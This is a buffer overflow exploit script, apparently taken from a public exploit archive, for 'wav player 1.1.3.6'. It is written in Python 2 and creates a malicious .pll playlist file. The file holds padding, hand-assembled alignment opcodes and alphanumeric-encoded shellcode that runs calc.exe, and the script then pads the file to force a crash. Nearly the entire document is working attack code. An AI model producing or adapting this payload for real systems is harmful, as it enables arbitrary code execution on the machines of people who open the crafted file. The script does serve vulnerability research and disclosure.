# Exploit Title: wav player 1.1.3.6 .pll Buffer Overflow# Date: 12/09/2011# Author: Ivan Garcia Ferreira# Version: 1.1.3.6# Tested on: Windows 7 SP1 x86 Spanish## Description:# Wav player can not handle properly large playlists (more than 1G). # Reproduce:# Open the wav player, make a playlist and save it. Then, close the # player and run this exploit to create the new playlist. When you open again # wav player, you will see the calc. ;)## Thanks to:# Corelan Team for their excelent articles about exploits
fichero = open("wv_player.pll","w")
print "[+] Creating exploit .pll..."
fichero.write("A"*1034)# Padding
fichero.write("t%dA")#help the first ret
fichero.write("\x6d")#nop/align
fichero.write("\x55")#push ebp
fichero.write("\x6d")#nop/align
fichero.write("\x58")#pop eax
fichero.write("\x6d")#pop/align
fichero.write("\x05\x14\x11")#add eax,0x11001400
fichero.write("\x6d")#pop/align
fichero.write("\x2d\x04\x11")#sub eax,0x11001300
fichero.write("\x6d")#pop/align
fichero.write("\x50")#push eax
fichero.write("\x6d")#nop/align
fichero.write("\xc3")#ret
fichero.write("B"*306)# more padding# Shellcode WinExec "calc.exe"
fichero.write("PPYAIAIAIAIAQATAXAZAPA3QADAZA"+"BARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA"+"58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABAB"+"AB30APB944JBKLK8U9M0M0KPS0U99UNQ8RS44KPR004K"+"22LLDKR2MD4KCBMXLOGG0JO6NQKOP1WPVLOLQQCLM2NL"+"MPGQ8OLMM197K2ZP22B7TK0RLPTK12OLM1Z04KOPBX55"+"Y0D4OZKQXP0P4KOXMHTKR8MPKQJ3ISOL19TKNTTKM18V"+"NQKONQ90FLGQ8OLMKQY7NXK0T5L4M33MKHOKSMND45JB"+"R84K0XMTKQHSBFTKLL0KTK28MLM18S4KKT4KKQXPSYOT"+"NDMTQKQK311IQJPQKOYPQHQOPZTKLRZKSVQM2JKQTMSU"+"89KPKPKP0PQX014K2O4GKOHU7KIPMMNJLJQXEVDU7MEM"+"KOHUOLKVCLLJSPKKIPT5LEGKQ7N33BRO1ZKP23KOYERC"+"QQ2LRCM0LJA")# Padding to get the crashfor cont in range(1,14000):
fichero.write("A"*15000)
fichero.close()
print "[+] File Exploit .pll Created."
